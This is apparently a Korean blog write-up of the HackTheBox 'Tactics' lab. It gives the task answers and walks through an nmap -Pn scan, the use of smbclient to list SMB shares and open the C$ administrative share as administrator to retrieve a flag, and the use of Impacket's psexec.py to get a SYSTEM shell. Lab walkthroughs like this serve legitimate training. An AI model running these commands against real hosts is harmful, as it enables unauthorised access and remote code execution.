[Tier1] Tactics (nmap -Pn option)
2026. 4. 4. 22:13

Task

  • Which Nmap switch can we use to enumerate machines when our ping ICMP packets are blocked by the Windows firewall?
    • -Pn
  • What does the 3-letter acronym SMB stand for?
    • Server Message Block
  • What port does SMB use to operate at?
    • 445
  • What command line argument do you give to smbclient to list available shares?
    • -L
  • What character at the end of a share name indicates it's an administrative share?
    • $

Write Up

nmap으로 포트 스캐닝을 먼저 해보겠다.

task를 참고하여 -Pn 옵션을 사용해보았다.

  • -Pn : 방화벽이 핑을 무시해도 강제로 포트를 두드려보며 응답을 확인한다.

445 port의 smb를 보면 좋을 것 같다.

`smbclient -L 10.129.6.78 -U administrator`

smbclient //10.129.6.78/C$ -U administrator
smbclient \\10.129.6.78\\C$ -U administrator

C$ 에 접근하여 Administrator 사용자를 살펴보겠다.

ls와 cd, dir을 명령어를 이용하여 flag 파일을 찾아가보자.

`\Users\Administrator\Desktop\flag.txt`를 확인했고 이를 get 명령어로 가져오면 flag를 획득할 수 있다.

참고로 `python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator@10.129.6.78` 명령어를 이용하여 시스템 권한의 셸을 따는 것도 가능하다!

'HackTheBox' 카테고리의 다른 글

[Tier1] Pennyworth (Jenkins)  (0) 2026.04.04
[Tier1] Bike (SSTI)  (0) 2026.04.04
[Tier1] Funnel (tunneling, postgresql)  (0) 2026.04.04
[Tier1] Ignition (Most common passwords)  (0) 2026.04.04
[Tier1] Three (wfuzz, s3, php web shell)  (0) 2026.04.04